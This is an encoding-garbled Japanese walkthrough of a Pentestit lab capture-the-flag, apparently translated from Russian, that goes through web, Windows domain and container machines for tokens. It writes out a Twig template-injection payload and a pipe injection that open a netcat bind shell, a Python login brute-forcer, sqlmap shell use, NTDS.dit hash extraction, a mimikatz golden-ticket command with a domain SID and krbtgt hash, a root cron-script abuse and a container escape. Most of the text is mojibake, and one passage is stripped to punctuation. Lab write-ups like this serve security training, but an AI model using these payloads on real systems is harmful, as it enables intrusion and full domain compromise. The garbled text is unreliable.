http://192.168.0.7/sources/43f1045f7bfd9bac63fc56dee0de5fc079b2e8a5b504548052de295444e71f5a496e1b931063b6e731844c2bfc2fd3f2cde4cd566d7c77c6e195a8b1362d9955f5ecc512b28eed353386bd0c07f7e17704ea3e4c59450e1b1c2a30e19bfacff4662cb0/($_SESSION).php?session=nc -e /bin/sh -nvlp 1234
ãããŠããã«æ¥ç¶ããŸãïŒ

ããã次ã®ããŒã¯ã³ã§ãïŒ
hall-of-fame
192.168.0.8ã§éããŠããããŒãã調ã¹ããšãããæ¢ç¥ã®ããã«ãŒã®èª¬æãšãã°ã€ã³æ©èœãåãããµã€ããèŠã€ãããŸããã

ãµã€ãããããã¢ã¯ã»ã¹å¯èœãªãã£ã¬ã¯ããªãšé ããã£ã¬ã¯ããªã調ã¹ãå©çšå¯èœãªãŠãŒã¶ãŒãç¹å®ããããšããããšããå§ãããšäŸ¿å©ã§ãã æ®å¿µãªããããã°ã€ã³ãã©ãŒã ã¯ããç¥ãããååã§ã¯æ©èœããŸããã
http://192.168.0.8/index.php?hname=James
ãããªã¢ãã¬ã¹ã«æ³šæãåããã
http://192.168.0.8/index.php?hname=James
ãããã¯ããã©ã¡ãŒã¿ãŒãLFIã¿ã€ãã®è匱æ§ïŒããŒã«ã«ãã¡ã€ã«ã®å å«ïŒã®äŸã§ããããšãå€æããå¯èœæ§ãããããã§ãã dirsearchã«åãæ¿ããŠãé ããã£ã¬ã¯ããªãèŠã€ããããšããŸãã

ãšããããèå³æ·±ããã¡ã€ã«ãèŠã€ãããŸããïŒ/backup/passwords.txtãããã³/ devãµããã©ã«ããŒã¯ãåºæ¬èªèšŒã®èåŸã§éããããŸããã ãã°ã€ã³ããŒãžã§ãããã®ãã¹ã¯ãŒãã䜿çšããŸãã

ãã°ã€ã³åŸã/ devéšåã®ãã¹ã¯ãŒããååŸããŸãã ããã䜿çšããŠ/ devã«ç§»åããŸãã

å éšã«ã¯å€éšãµã€ãã®ã³ããŒããããŸããã以åã«çãããŠãããã©ã¡ãŒã¿ãŒhnameã¯ãµãŒããŒåŽãã³ãã¬ãŒãã€ã³ãžã§ã¯ã·ã§ã³ã«å¯ŸããŠè匱ã§ãã ã芧ã®ãšããã{{7 * 7}}ãšå ¥åãããšããµãŒããŒã§èšç®ãããããŒãžããããŒã«æäœã®çµæïŒ49ïŒã衚瀺ãããŸãã RCEãååŸããŸããã

æ»æèªäœã¯äžèšã®ãªã³ã¯ã§è©³çŽ°ã«èª¿ã¹ãããšãã§ãããã€ã³ãã·ã§ã«ãäœæããããã«ãã€ããŒããã³ã³ãã€ã«ããããšããŸãã æåã«ããŠãŒã¶ãŒåãæ確ã«ããŸãã

bind shell: http://192.168.0.8/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("nc -nvlp 1234 -e /bin/sh")}}
æ¥ç¶ãããšã次ã®ããŒã¯ã³ãèŠã€ãããŸãïŒ

news
ãèªã
newsïŒ192.168.0.5ïŒ-ã°ããŒãã«ããŒã¿ã»ãã¥ãªãã£ã®æ¬¡ã®ãµã€ããå€èŠã¯æ®¿å ã«äŒŒãŠãããç»é²ããã°ã€ã³ããã¹ã¯ãŒãã®ãªã»ãããå éšãã¥ãŒã¹ã®åŠç¿ãå¯èœã§ãã
ãã°ã€ã³ãã©ãŒã ã§ã¯ãé»åã¡ãŒã«ãšãã¹ã¯ãŒãã®å ¥åãæ±ããããŸãã

ãã§ã«èŠã€ãã£ããŠãŒã¶ãŒïŒa.modlinãe.lindseyãªã©ïŒã®ãã°ã€ã³ãšãã¹ã¯ãŒãã®æ¢ç¥ã®çµã¿åããããã¹ãŠè©Šãããšãããããããç»é²ãããŠããªãããšãããããŸãã-ééã£ãé»åã¡ãŒã«ã¡ãã»ãŒãžãåãåããŸããã åæã«ãadmin @ gds.labãå ¥åããããšãããšãééã£ããã¹ã¯ãŒããšããå¥ã®ã¡ãã»ãŒãžã衚瀺ãããŸãã ããã¯ããŠãŒã¶ãŒadmin@gds.labãç»é²ãããŠããããšãæå³ããŸãã
Burp Suiteã䜿çšããŠãadmin @ gds.labã®ãã¹ã¯ãŒããèŠã€ããããšããŸãããããã¯æåã«ã€ãªãããŸããã 次ã«ãåã³dirsearchã«ç®ãåãããã¥ãŒã¹ãµã€ãã«ä»ã«é ããŠãããã®ãæ¢ããŸãã

/ oldãã©ã«ããŒãããã³ãã®äžã«å€ãããŒãžã§ã³ã®ãã¥ãŒã¹ãµã€ãããããããã«ã¯ãåçŽãªãŠãŒã¶ãŒããã€ãŸããŠãŒã¶ãŒã®ååšã瀺åããèå³æ·±ãã³ã¡ã³ãããããŸãã

æšæž¬ã確èªããŸãããã / oldã«ãã°ã€ã³ããŠãäœãããããããã®ã«ã¯ãªããŸããããuser @ gds.labã§ãŠãŒã¶ãŒãã¹ã¯ãŒãã䜿çšããŠæ°ãããã¥ãŒã¹ãµã€ãã«ã¢ã¯ã»ã¹ãããšã次ã®ããŒãžã衚瀺ãããŸãã

ããŠãããŒã¯ã³ãååŸããããã«ç®¡çè ã®äžã«è¡ãããšã¯æ®ã£ãŠããŸãã æ°ããããŒãž-user_info.phpã®ååšã«ã€ããŠåŠç¿ããã°ããã§ãããã®ããŒãžã®å€ãéšåãèŠãŠã¿ãŸãããã

äœåºŠãè©Šè¡ããçµæããã®ã¢ãã¬ã¹ã䜿çšããŠç®¡çè ãšããŠãã°ã€ã³ããããšãããšãã°ã€ã³ã§ããªããªããŸãããuser_info.phpã®åºåã¯å€æŽãããããšãç解ããŠããŸãã
http://192.168.0.5/old/login_2.php?username=admin&password=admin

ããã¯ãå®éãç§ãã¡ã¯å ¥ã£ãïŒ ãã ããæ°ããuser_info.phpã«ãããå éšã«å ¥ãããšãã§ããªããªããŸããã
ããããã2ã€ã®ãµã€ããåãã»ãã·ã§ã³ã䜿çšããŠãããšçµè«ä»ãããŠãŒã¶ãŒã«é¢ããæ å ±ããã®ã»ãã·ã§ã³ã«ä¿åã§ããŸãã ã©ãããã/å€ããå ¥åããããšãããšãã»ãã·ã§ã³ã®ãŠãŒã¶ãŒåãã£ãŒã«ãã«ãŠãŒã¶ãŒåãä¿åããããã¹ã¯ãŒããæ£ãããªãå Žåã¯åã«user_info.phpã«ãªãã€ã¬ã¯ããããŸããïŒæ£ãããã¹ã¯ãŒãã§ãã°ã€ã³ã«æåããåŸã«ã®ã¿ãŠãŒã¶ãŒåãä¿åããã®ã§ã¯ãªãïŒã /å€ããµã€ãã«ã¯ããã§ååã§ãããæ°ãããµã€ãã¯ãŸã ã¡ãŒã«ã䜿çšããŠãããããuser_info.phpã«ã¢ã¯ã»ã¹ã§ããŸããã
adminãŠãŒã¶ãŒã®ãã¹ã¯ãŒãããªã»ããããŠã¿ãŸãããã
http://192.168.0.5/password_restore_2.php?email=admin@gds.lab
ããã°ã©ããŒããã¹ã¯ãŒããªã»ãããã©ãŒã ã§åãééãïŒã€ãŸããã»ãã·ã§ã³ã§é»åã¡ãŒã«ãä¿åããïŒãæåŸ ããŠã管çè ãšããŠãã°ã€ã³ããããã«ã»ãã·ã§ã³ã§æ£ããé»åã¡ãŒã«ã¢ãã¬ã¹ãä¿åããããšããŸãã
å šäœãšããŠãããã»ã¹å šäœã¯æ¬¡ã®æé ã§æ§æãããŸãã
-
http://192.168.0.5/login_2.php?email=user%40gds.lab&password=user
æ°ãããµã€ãã«user@gds.lab/userãšå ¥åããŸã -
http://192.168.0.5/old/login_2.php?username=admin&password=user
å€ãadminããçŸåšã®ãŠãŒã¶ãŒãšããŠèšå® -
http://192.168.0.5/password_restore_2.php?email=admin@gds.lab
çŸåšã®ã¡ãŒã«ã¢ãã¬ã¹ãšããŠãadmin@gds.labããšããå€ãèšå®ããŸã -
http://192.168.0.5/user_info.php
管çè ãšããŠãã°ã€ã³ããŠããŸã
ãã°ã€ã³ã«æåãããšãããŒã¯ã³ãååŸããŸãïŒäžã®ã¹ã¯ãªãŒã³ã·ã§ããã§åãåããŸãïŒã

ãããŠä»ããã¥ãŒã¹ã¯å±æããŸããïŒ
web-control
ãååŸãweb-control
éåžžã©ãããããŒãã¹ãã£ã³ããå§ããŸãããããã®ããã«ãSSHãã¹ãã§æäŸãããŠããnmapã䜿çšããŸãã

80çªç®ã®ããŒãã調ã¹ããšãããã¡ãŒã«ãåéããããã®ãã©ãŒã ïŒããã«ã¯æ©èœããŸããïŒãããã³/ uploadsãã©ã«ããŒïŒèå³æ·±ããã®ã¯äœãèŠã€ãããŸããã§ããïŒãé€ããŠãèå³æ·±ããã®ã¯èŠã€ãããŸããã§ããã
éæšæºã®ããŒã1503ã«æ³šç®ããŸããããããã調ã¹ãã«ã¯ãæ¥ç¶ããŠã¿ãŠãã ããã
nc 192.168.0.6 1503

ã©ãããããã°ã€ã³ãšãã¹ã¯ãŒãã®çµã¿åãããéžæããå¿ èŠããããŸãã sshã殿å ãã¡ãŒã«ã§ç§ãã¡ã«ç¥ãããŠãããã¹ã¯ãŒããè©ŠããŠã¿ãŸããããç§ãã¡ã¯ãã¹ãŠãããã»ã©åçŽã§ã¯ãªãããšãç解ããå°ããªã¹ã¯ãªãããæžãå¿ èŠããããŸãïŒ
"""Sockets""" import socket WEB_CONTROL_HOST = '192.168.0.6' WEB_CONTROL_PORT = 1503 USER_FILE = '/root/pentestit/webc/users.txt' PASS_FILE = '/opt/SecLists/Passwords/john.txt' def recv_until(string, sock): """Receives data from socket until certain string is found""" data = "" while True: tmp = sock.recv(1) if tmp == "": break data += tmp if data.endswith(string): break return data def attempt_login(user, password): """Attempts to log in under a specified account""" # This should not connect every time and should be multi-threaded in an ideal world web_control = socket.socket(socket.AF_INET, socket.SOCK_STREAM) web_control.connect((WEB_CONTROL_HOST, WEB_CONTROL_PORT)) reply = recv_until("Enter login: ", web_control) web_control.send(user) reply = recv_until("Enter password: ", web_control) web_control.send(password) reply = web_control.recv(6) web_control.close() return "Error!" not in reply with open(USER_FILE) as user_file: for user_line in user_file: with open(PASS_FILE) as pass_file: for pass_line in pass_file: if attempt_login(user_line, pass_line): print "Success: " + user_line.rstrip('\n') + ":" + pass_line.rstrip('\n')
ãŠãŒã¶ãŒãšããŠãsshã§ç¥ã£ãŠããã¢ã«ãŠã³ããšããã€ãã®æšæºåãæžããŸãã
admin administrator root user k.barth m.howard g.leone j.wise s.locklear e.lindsey a.modlin
ã¹ã¯ãªãããå®è¡ããŠå®è¡ãããã°ãããããšç®çã®çµæãåŸãããŸãã

ããã£ãïŒ å¿ èŠãªãã°ã€ã³ãšãã¹ã¯ãŒããå ¥åããåŸãç§ãã¡ã¯ããã€ãã®ã¹ã¯ãªãããèµ·åããããã®èªå·±èšè¿°ããŒã«ã«ãªã£ãããšãç解ããŠããŸãã
å€ãã®è匱æ§ã¯ãäžååã«æ€èšŒããããŠãŒã¶ãŒå ¥åã«é¢é£ããŠããŸããã³ãã³ãã€ã³ãžã§ã¯ã·ã§ã³ãéæããŠã¿ãŸãããã å ¥åãã·ã¹ãã ã«æž¡ãããå Žåãåºåãæå-;ãïŒããŸãã¯|ã䜿çšããŠè¿œå ã®ã³ãã³ããè¿œå ã§ããŸãã ãã£ãŠã¿ãŸãããïŒ

|ãé€ããã¹ãŠããã£ã«ã¿ãŒåŠçãããŸãããæããã«éçºè ãèŠéããŠããŸããã ããŒã ã®äœ¿çš
| nc -nvlp 1234 -e /bin/sh
| nc -nvlp 1234 -e /bin/sh
ãWebã³ã³ãããŒã«ã«ãã€ã³ãã·ã§ã«ãäœæããŸãã ããã§ãæ¥ç¶ããŠããŒã¯ã³ãèŠã€ããã ãã«ãªããŸãã
nc 192.168.0.6 1234 cat /var/opt/token.txt
ããŒã¯ã³store
ãããã¯ãŒã¯å³ãããããããã«ãã¹ãã¢ã¯2ã€ã®ãã¹ã-172.16.0.4ïŒéçšïŒãš172.16.0.5ïŒéçºïŒã§è¡šãããŸãã ããã«ãã¹ãã¢ã®ã³ããŒã¯sshãã¹ãã®/ var / www /ãã©ã«ããŒã«ãããŸãã
/ var / wwwã®å 容ãæ€èšããŠã次ã®çµè«ãå°ãåºããŸãã
- OpenCartã®ææ°ããŒãžã§ã³ã䜿çšããŠãããæ¢ç¥ã®è匱æ§ã¯ãããŸãã
-
/var/www/config.php
ã§ãã¹ãã¢ã®ã³ããŒãã€ã³ã¹ããŒã«ãããŠããããŒã«ã«ããŒã¿ããŒã¹ã®ãã¹ã¯ãŒããèŠã€ããŸãã adminãŠãŒã¶ãŒã®ãã¹ã¯ãŒãã®ããã·ã¥ãèŠã€ããŸã-ä»ã®ãšããããããå¯äžã®åžæã§ãã
Hashcatã¯æè¿ãOpenCart圢åŒã®ããã·ã¥ãéžæããæ©èœãè¿œå ããŸããã è©ŠããŠã¿ãŸãããïŒ

æ®å¿µãªãããååã«å€§ããªèŸæžã§ããã¹ã¯ãŒããèŠã€ããããšã¯ã§ããŸããã
ç§ãã¡ã¯ã¹ãã¢ãšéçºã¹ãã¢ã«æ³šæãåããŸã-ãããã圌ãã¯è¿œå ã®é ããã¡ã€ã«ãæã£ãŠããããOpenCartã®å€ãè匱ãªããŒãžã§ã³ã䜿çšããŠããŸãã ãã°ããããŠãdev-storeãã·ã³ã§ã®SQLã€ã³ãžã§ã¯ã·ã§ã³ãçºèŠããŸãããããã¯sshãstoreã«ã¯ãããŸããã§ãããæããã«ã è匱æ§ãæã€å€ãããŒãžã§ã³ããã®ãµãŒããŒã«æ®ã£ãŠããããã§ãã
確èªããã«ã¯ããšã³ããªãè¿œå ããŠhostsãã¡ã€ã«ãå€æŽããŸãã
172.16.0.5 store.gds.lab
SQLmapãå®è¡ããŸãã
sqlmap -u 'http://store.gds.lab/index.php?route=product/product&product_id=53*' --sql-shell

dev-storeã®ããŒã¿ããŒã¹ã«ã¢ã¯ã»ã¹ããŸããã æ®å¿µãªããããã¡ã€ã«ã·ã¹ãã ãžã®ã¢ã¯ã»ã¹ã¯å¶éãããŠããŸãïŒ/ etc / passwdã®èªã¿åãããOUTFILEãä»ãããã¡ã€ã«ãžã®æžã蟌ã¿ã¯æ©èœããŸããïŒããããã£ãŠãããŒã¯ã³ã¯çŽæ¥ããŒã¿ããŒã¹ã«ãããŸãã

ãããŠä»ãåºã奪ãããŸããïŒ
win-term
åŠç¿
ããã«é²ãã«ã¯ãåå è ã¯4æ¥ä»¥äžå¿ èŠã§ãããããã€ãã®ããã«ãã¯ã¡ããã©éããŸããã çŸæç¹ã§ã¯ã3ã€ã®ããŒã¯ã³ïŒ
win-term, win-dc0
ã
cloud
ãæªè§£æ±ºã®ãŸãŸã§ãã
Windowsã¿ãŒããã«ãšãã¡ã€ã³ã³ã³ãããŒã©ãŒïŒDC0ïŒã®ããŒããã¹ãã£ã³ããçµæãè¿œå ã®ãµãŒãã¹ã¯éããŠããããWindowsã®ããŒãžã§ã³ã¯2008 R2ã§ãããã³ãŒãå®è¡ã®ååŸãèš±å¯ããæ¢ç¥ã®è匱æ§ã¯ååšããŸããã ããã«ãããããããwin-termã¯RDPã®è匱æ§ã䜿çšããŠãªããŒãã§ãããããæŽæ°ããã°ã©ã ãé·æéã€ã³ã¹ããŒã«ãããŠããªããšå€æã§ããŸãã ããã¯ããã·ã³ã«å ¥ã£ãåŸã«ç®¡çè ã«ç¹æš©ãã¢ããã°ã¬ãŒãããããšã¯ããããããã»ã©é£ãããªãããšãæå³ããŸãã
èŸæžã§ãã¹ã¯ãŒããåæããŠããã©ã®ã¢ã«ãŠã³ãã§ãç®çã®çµæãåŸãããŸããã 念ã®ããã以åã«èŠã€ãã£ãè³æ Œæ å ±ããã¡ã€ã³ã«ååšããããšã確èªããŠãã ããã

ãã¹ãŠãæŽã£ãŠããŸãããã®æ®µéã§ã¯ãa.modlinãše.lindseyã®2人ã®ãŠãŒã¶ãŒã®ãã¹ã¯ãŒãããããŸããe.lindseyã®ãã¹ã¯ãŒããå€æŽããŠãæšæºã®ãã¡ã€ã³ããªã·ãŒã«æºæ ãã倧æåãšå°æåãæ°åãå«ãŸããããã«ããŸããe.lindseyãã¹ã¯ãŒãã®æåã®æåã倧æåã«ããããšããå§ããŸãããã
rdesktop 192.168.0.3 -u "GDS-OFFICE\\e.lindsey" -p "**********" -r disk:share=/root/pentestit/term -r clipboard:PRIMARYCLIPBOARD

æ¥ç¶ã§ããïŒããç¥ãããŠããè匱æ§MS16-023ã䜿çšããŠã管çè ã®ç¹æš©ãå¢ãããŸãããããã®ã³ãŒããexeãã¡ã€ã«ãšããŠã³ã³ãã€ã«ããŸããããPowerShellã§ãå®è¡ã§ããŸãã以äžãéå§ããŸãã

çµæã®ç®¡çã³ã³ãœãŒã«ã§ãå¥ã®ãŠãŒã¶ãŒãäœæããäœåãªãã¡ã€ã«ãåé€ããŠãããŒã«ã«ç®¡çè ã®äžã«ç§»åããŸãã
rdesktop 192.168.0.3 -u "TermAdmin" -p "Admin123" -r disk:share=/root/pentestit/term -r clipboard:PRIMARYCLIPBOARD

管çè ã«ã¯ãTrueCryptãšããŒã䜿çšããŠæå·åããããã£ã¹ã¯ãæ¥ç¶ããã¹ã¯ãªããããããŸãã 以äžãéå§ããŸãã

ç»å Žãããã©ã€ãXã«ã¯ãããŒãå«ãKeePassããŒã¿ããŒã¹

ããããŸãããã®äžã«ã¯ãrrossã¢ã«ãŠã³ãããã¯ã©ãŠããžã®ãã¹ã¯ãŒããšãåŸ æã®ããŒã¯ã³ããããŸãã

ãã¡ã€ã³ç®¡çè
ã®æš©å©ãååŸããŸã win-dc0
端æ«ã®å 容ã確èªããåŒãç¶ããæã ã¯ããã¯ã¢ãããã£ã¹ã¯ã®ãã¡ã€ã³ã³ã³ãããŒã©ãšãã©ã«ããèŠã€ããïŒ

ãµãŒã管çã³ã³ãœãŒã«ã«VHDãã¡ã€ã«ãæ·»ä»ïŒ

次ã«ããã¡ã€ã«ãã³ããŒ
Windows\NTDS\Ntds.dit
ãã
Windows\System32\config\SYSTEM
ããŒã«ã«ã«ãŒãªãŒã»ãã·ã³ã«æ°ããæ¥ç¶ãããVHDã§ã

ç¶è¡ããåã«ãNTDS.ditããŒãã«ãæäœããããã®ç¹å¥ãªãŠãŒãã£ãªãã£libesedbããã³NTDSXtractãã€ã³ã¹ããŒã«ããŠæºåããå¿ èŠããããŸãã次ã®æ¹æ³ã§ããããã€ã³ã¹ããŒã«/éžæã§ããŸãïŒ
cd /opt git clone https://github.com/libyal/libesedb.git cd libese/ apt-get install git autoconf automake autopoint libtool pkg-config build-essential ./synclibs.sh ./autogen.sh ./configure make make install cd .. git clone https://github.com/csababarta/ntdsxtract.git
ããã§ãã¹ãŠæºåå®äºã§ãããŸãã䜿çšããŠã®Ntds.ditããæœåºããŒãã«
esedbexport
ïŒ

NTDSXtract䜿çšntds.dit.exportããã£ã¬ã¯ããªã«æœåºããã·ã¥ãžïŒ

ãã®ã³ãã³ãã®çµæã¯ãæ°ãããã©ã«ãã®ãã³ãã§æœåºãããããã·ã¥nt.john.outãã¡ã€ã«ãååŸ/ïŒ

æã æœåºããã管çããã·ã¥ãããã¹ã¯ãŒããå埩ã§ããå Žåã¯ãããã§åæ¢ã§ããŸãããã®å Žåãããã¯ããã¯ã¢ããã§ããããããã¹ã¯ãŒãã¯ç¡å¹ã«ãªããŸãããããã£ãŠãPass the TicketïŒpttïŒæ»æã䜿çšããŸãããã®æ»æã§ã¯ãkrbtgtã¢ã«ãŠã³ãã®ããã·ã¥ã䜿çšããŠããããããŽãŒã«ãã³ãã±ãããçæããŸãã
ãããè¡ãã«ã¯ãmimikatzãã¿ãŒããã«ã«ããŠã³ããŒããã管çè æš©éã§å®è¡ããŸãã

ãŽãŒã«ãã³ãã±ãããäœæããã«ã¯ããã¡ã€ã³SIDïŒ
lsadump::lsa
äžèšã®ã¹ã¯ãªãŒã³ã·ã§ããã®ã³ãã³ãã䜿çšããŠååŸïŒããã¡ã€ã³ç®¡çè ã¢ã«ãŠã³ãåïŒNTDS.ditããååŸïŒãkrbtgtã¢ã«ãŠã³ãã®ããã·ã¥ïŒäžèšãååŸïŒãããã³ç®¡çè ãå±ããã°ã«ãŒãã®ååïŒæšæºå€ïŒ500ã501ã513ã512ã520ã518ã519ïŒã
ãã®æ å ±ã䜿çšããŠããŽãŒã«ãã³ãã±ãããäœæããŠé©çšããŸãã
kerberos::golden /domain:gds-office.lab /sid:S-1-5-21-421115581-889488229-2938181853 /rc4:1dc9bae0282962e7d761a2eda274e6d7 /id:500 /user:administrator /groups:500,501,513,512,520,518,519 /ptt
次ã«ããã±ãããé©çšããŠå¥ã®cmd.exeãå®è¡ãããã¡ã€ã³ã³ã³ãããŒã©ãŒã®C $ãªãœãŒã¹ãžã®ã¢ã¯ã»ã¹ãååŸ

ããŸããããŒã¯ã³ã¯æ¬¡ã®ãšããã§ããçŸæç¹ã§ã¯ããã®ãã£ã¹ã¯ã®ãã¡ã€ã³ã«å¯Ÿããå®å šãªç®¡çè æš©éãæã£ãŠããããããã¡ã€ã³ã³ã³ãããŒã©ãŒã§ä»»æã®ã³ãŒããå®è¡ã§ããŸããããã«ãããéåžžããã³ãã¹ãã®æ£åžžçµäºãããŒã¯ãããŸãã
ãã®å Žåãæ»æã¯å€§å¹ ã«ç°¡çŽ åãããŸããããã¡ã€ã³ã³ã³ãããŒã©ãŒãã£ã¹ã¯ã®ããã¯ã¢ããã³ããŒããããåãmimikatzãå«ãæ»æã®ã¢ã¯ãã£ããªæ€åºããªããå¿ èŠãªãããããããŸããã§ããã
æåŸã®ããã³ãã£ã¢ã¯ cloud
éåžžã©ãããããŒãã¹ãã£ã³ãã
éå§ããŸããããŒã2222ã§SSHãµãŒãã¹ãçºèŠããããã¿ãŒããã«ã§èŠã€ãã£ãrrossã¢ã«ãŠã³ããšãã¹ã¯ãŒãã䜿çšããŠããã«ã¢ã¯ã»ã¹ããããšããŸãã
ã泚æ
, ownCloud ( ), - , sqlite ownCloud (http://cloud.gds.lab/data/owncloud.db), ( ). , SSH- rross , /data/users/ SSH, , , . 2222 , rross user enumeration timing attack. osueta .
40 â , OpenSSH , â . OpenSSH , , .
40 â , OpenSSH , â . OpenSSH , , .
ãããã«ããŠããããŒã¯ã³ãæ£åžžã«åä¿¡ããåŸ
win-term
ãSSHã«ãã°ã€ã³ã§ãããã¹ã¯ãŒãããããŸãã
èå³æ·±ãããšã«ããµãŒããŒã«ã¢ã¯ã»ã¹ãããã³ã«ãç°ãªãlxcã³ã³ãããŒïŒlxc1ããlxc5ïŒã«ãªããŸãã

å匷ããåŸãrrossãŠãŒã¶ãŒã®ç¹æš©ã§ã¯äœãèå³æ·±ããã®ãåŸãããªããããç¹æš©ãäžããå¿ èŠãããããšãæããã«ãªããŸãã
lxc1ã§æš©å©ç®¡çã®å€å žçãªãšã©ãŒãçºçããŸããïŒ

ã¹ã¯ãªãã
clear_nginx_logs.sh
ã¯rootæš©éã§å®æçã«å®è¡ãããã©ã®ãŠãŒã¶ãŒã§ãå€æŽã§ããŸããã·ã¹ãã ã«æ°ãããŠãŒã¶ãŒãäœæããŸãã

ããã§ã¯ãIDã0ïŒã«ãŒãïŒã§ãããffããã³ãã¹ã¯ãŒã123ïŒåçŽåã®ããã«å»æ¢ããã圢åŒã§ããã·ã¥ãããŠããŸãïŒãšããååã®æ°ãããŠãŒã¶ãŒã/ etc / passwdã«è¿œå ããŸãããã°ããããŠããã®ãŠãŒã¶ãŒã®äžã«ç§»åããã³ã³ãããŒãžã®ãã«ã¢ã¯ã»ã¹ãååŸããŸãã

ãŠãŒã¶ãŒã¯è¿œå ãããŸãããã³ã³ãããŒã«ã¯ããŒã¯ã³ããŸã ãããŸãããã³ã³ãããŒã®å€éšã«ç§»åããå¿ èŠããããŸããæè¿ãNCCã°ã«ãŒãã¯ãã®äž»é¡ã«é¢ããç 究ãçºè¡šããŸããã 16ããŒãžã®äŸã¯ããã¹ããã·ã³ã®ãã¡ã€ã«ã·ã¹ãã ã«ã¢ã¯ã»ã¹ã§ãããšã¯ã¹ããã€ãã§ãã
ã³ã³ããã§ãã¡ã€ã«ãã³ã³ãã€ã«ããŠå®è¡ããŸãã

æåŸã«-æåŸã«ããã¹ããã·ã³ã®token.txtãã¡ã€ã«

ã®æåŸã®ããŒã¯ã³ïŒæåŸã®ããŒã¯ã³ãååŸãããŸãã
ntdsutil_snapshot.zipãã¡ã€ã«ã«æ³šæããŸããã-ããŒã«ã«ã³ã³ãã¥ãŒã¿ãŒã«ã³ããŒãããšãå¥ã®æ¹æ³ã§ntds.ditããã³SYSTEMãã¡ã€ã«ã®ããã¯ã¢ããã³ããŒãååŸã§ããŸããããŒã«ã«SSHãµãŒãã¹ããªã³ã«ããŠãã³ã³ãããŒã§äœ¿çšå¯èœã«ããŸãã
service ssh start
次ã«ãSSHãä»ããŠãªã¢ãŒãããŒã転éã

è¡ããŸã

ãscpãä»ããŠãã¡ã€ã«ãã³ããŒããŸãã解åãããšãwin-dc0ã«å¯ŸããŠåãntds.ditãšSYSTEMãååŸã

ããŸãã
ããã«ãããã¹ãŠã®è³æã¯æè²ç®çã§ã®ã¿æäŸãããŠããã®ã§ãç 究宀ã®ééã«é¢ããã³ã¡ã³ããæè¿ããŸããç¹å®ã®åé¡ã解決ããããŸããŸãªæ¹æ³ã«ã€ããŠãã§ããã ãå€ãã®äººã«åŠãã§ããããŸãã
å®éšå®€ãééãããããã¯ãŒã¯äžã®ãã¹ãŠã®ãã·ã³ã䜿çšããåã³ãçµéšããæéããªãã£ã人ã ã«å¹žéãç¥ããŸãã
Pentestitã®åªããç 究宀ã«æè¬ããŸã-ããã¯é¢çœãã£ãã§ãã
ãããããé¡ãããŸãïŒ 2017幎5æã«ç¬¬11ç 究æãåŸ ã£ãŠããŸãã